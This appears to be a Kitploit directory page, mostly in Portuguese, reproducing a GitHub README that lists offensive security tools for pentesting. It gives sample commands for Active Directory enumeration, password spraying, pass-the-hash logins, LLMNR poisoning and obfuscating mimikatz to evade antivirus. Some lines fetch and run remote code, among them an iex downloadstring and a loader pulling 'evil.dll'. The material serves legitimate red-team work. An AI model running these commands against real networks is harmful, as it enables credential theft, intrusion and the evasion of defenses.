Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Pentest-Tools-Collection — Coleção curada de ferramentas e comandos de segurança ofensiva para ataques ao Active Directory, C2, elevação de privilégios, ofuscação e testes de penetração web. | Kitploit
Ferramentas/GitHubGitHub/luemmelsec/pentest-tools-collection
Escalada de PrivilégiosExploraçãoEvasão de IDS/IPSColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingRecursos Curados

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Desenvolvimento de Payloads
GitHubluemmelsec/pentest-tools-collection

Pentest-Tools-Collection

Coleção curada de ferramentas e comandos de segurança ofensiva para ataques ao Active Directory, C2, elevação de privilégios, ofuscação e testes de penetração web.

Ver Repositório
906146há 29 diasRevisado pelo Kitploit

Pentest-Tools-Collection

Active Directory

AMSI

https://amsi.fail/

Tool Collections

WinPwn

https://github.com/S3cur3Th1sSh1t/WinPwn

Import-Module .\WinPwn.ps1

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Ghostpack

https://github.com/GhostPack

Seatbelt, KeeThief, Rubeus, SharpUp ...

Powersploit

https://github.com/PowerShellMafia/PowerSploit

PowerView, PowerUp, Get-GPPPassword ...

Enumeration

Bloodhound

https://github.com/BloodHoundAD/BloodHound

SharpHound.exe -d testdomain.com -c all,gpolocalgroup

Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup

https://github.com/fox-it/BloodHound.py

bloodhound.py -c all

ADRecon

https://github.com/adrecon/ADRecon

Para executar o ADRecon em um host membro do domínio.
PS C:\> .\ADRecon.ps1

Para executar o ADRecon em um host membro do domínio como um usuário diferente.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

Para executar o ADRecon em um host que não é membro usando LDAP.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>

Spraying-Toolkit

https://github.com/byt3bl33d3r/SprayingToolkit

Sprayer de Lync/Skype & OWA, gerador de wordlist, conversor de esquema de nomenclatura etc.

Spray no OWA
./atomizer.py owa contoso.com 'Fall2018' emails.txt

Spray no Lync
./atomizer lync contoso.com --user-as-pass usernames.txt

Modo de reconhecimento
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

MailSniper

https://github.com/dafthack/MailSniper

Atacar OWA & EWS
O esquema de nomenclatura deve ser algo como testdomain.com\schmidta ou aschmidt -> verifique o esquema com o módulo msf

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Get-ADUsernameFromEWS -EmailList email-list.txt

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt

msspray

https://github.com/0xZDH/msspray

Ferramenta de Enumeração e Spray para O365

Apenas enumera usuários sem fazer spray. É necessário um arquivo de texto com endereços de email completos [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose

MSOLSpray

https://github.com/dafthack/MSOLSpray

Sprayer para O365

Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

ExchangeRelayX

https://github.com/quickbreach/ExchangeRelayX

Atacar o EWS via autenticação NTLM sobre HTTP.

./exchangeRelayx.py -t https://mail.quickbreach.com

SharpView

https://github.com/tevora-threat/SharpView

Porte do PowerView para .NET

SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password

CrossLinked

https://github.com/m8r0wn/CrossLinked

Coletar endereços de email / usuários

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name

Post Exploitation

impacket

https://github.com/SecureAuthCorp/impacket

Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

Documentação oficial: https://mpgn.gitbook.io/crackmapexec/

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

EvilWinRM

https://github.com/mrnamp/EvilWinRM

Uma ferramenta para interagir com a implementação do WS-Management da Microsoft, também conhecida como PowerShell Remoting, a partir de uma máquina Linux.
Também pode ser usada para conectar com um hash em vez de senha.

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099

Também é capaz de executar C#, DLLs ou shellcode donut diretamente na memória. Os executáveis devem estar no caminho definido no argumento -e.

Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

Dll-loader -http -path http://10.11.12.13/evil.dll

Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin

Também pode contornar o AMSI, obter tickets Kerberos e assim por diante ...

SharpRDP

https://github.com/rasta-mouse/SharpRDP

Executa coisas via RDP. O usuário receberá uma notificação se a multi-RDP não estiver habilitada!

SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password

Inveigh

https://github.com/Kevin-Robertson/Inveigh

Ferramenta de spoofing e man-in-the-middle para ADIDNS/LLMNR/mDNS/NBNS/DNS em PowerShell

Import-Module Inveigh.psm1

Invoke-Inveigh -Consoleoutput Y

Responder

https://github.com/lgandx/Responder

Envenenador de LLMNR/NBT-NS/mDNS

./Responder.py -I eth0

C2

Covenant

https://github.com/cobbr/Covenant

PS-Empire

https://github.com/BC-SECURITY/Empire

PrivEsc

WinPEAS / LinPEAS

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SecWiki

https://github.com/SecWiki

Exploits para Linux & Windows

PowerShDll

https://github.com/p3nt4/PowerShdll

PowerShell sem PowerShell

rundll32 PowerShdll,main -w

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

UACME

https://github.com/hfiref0x/UACME

Watson

https://github.com/rasta-mouse/Watson

PrivescCheck

https://github.com/itm4n/PrivescCheck

Obfuscation

PEzor

https://github.com/phra/PEzor

Ofuscar binários C / C++

Novo módulo -> flutuação de ShellCode:

PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'

Veja https://twitter.com/phraaaaaaa/status/1453389564383404032?t=wcB-3NlNh9725L9_zRjdHg

Donut Syscall fork

https://github.com/S4ntiagoP/donut/tree/syscalls

Fork do gerador de shellcode / PE do Donut com syscalls

amber

https://github.com/EgeBalci/amber

Ofuscar binários C / C++

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

Ofuscador para scripts PowerShell.

xencrypt / BetterXencrypt

https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt

AQUARMOURY (em especial wraith)

https://github.com/slaeryan/AQUARMOURY

Coleção de ferramentas para contornar AV/EDR e outras coisas

root@kitploit:~
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100

Ofuscador e criptografador para scripts PowerShell.

ISESteroids

https://www.powershellgallery.com/packages/ISESteroids/2.7.1.7

Coleção de ferramentas para PowerShell ISE. Possibilidades de ofuscação.

PS2EXE

https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5

Converter PS1 em arquivo EXE.

Invoke-Sharploader

https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader

Um wrapper para binários C# que criptografa o payload e o descriptografa na memória.

Criptografar binário:

Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Carregar binário criptografado a partir da URL:

Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs

Carregar binário criptografado do disco com argumentos de linha de comando:

Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

inceptor

https://github.com/klezVirus/inceptor

Ofuscador para C# e PowerShell

Chimera

https://github.com/tokyoneon/Chimera

Ofuscador de scripts PowerShell

InvisibilityCloak

https://github.com/xforcered/InvisibilityCloak

Ofuscador de assemblies C#

ConfuserEx

https://github.com/yck1509/ConfuserEx

Ofuscador de assemblies C#

Charlotte

https://github.com/9emin1/charlotte

Loader de shellcode via D-Invoke

AVCleaner

https://github.com/lleon1435/avcleaner

Ofuscador de código-fonte C/C++

Diversos

SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray

Web

JSFScan: https://github.com/KathanP19/JSFScan.sh

Baixar ferramenta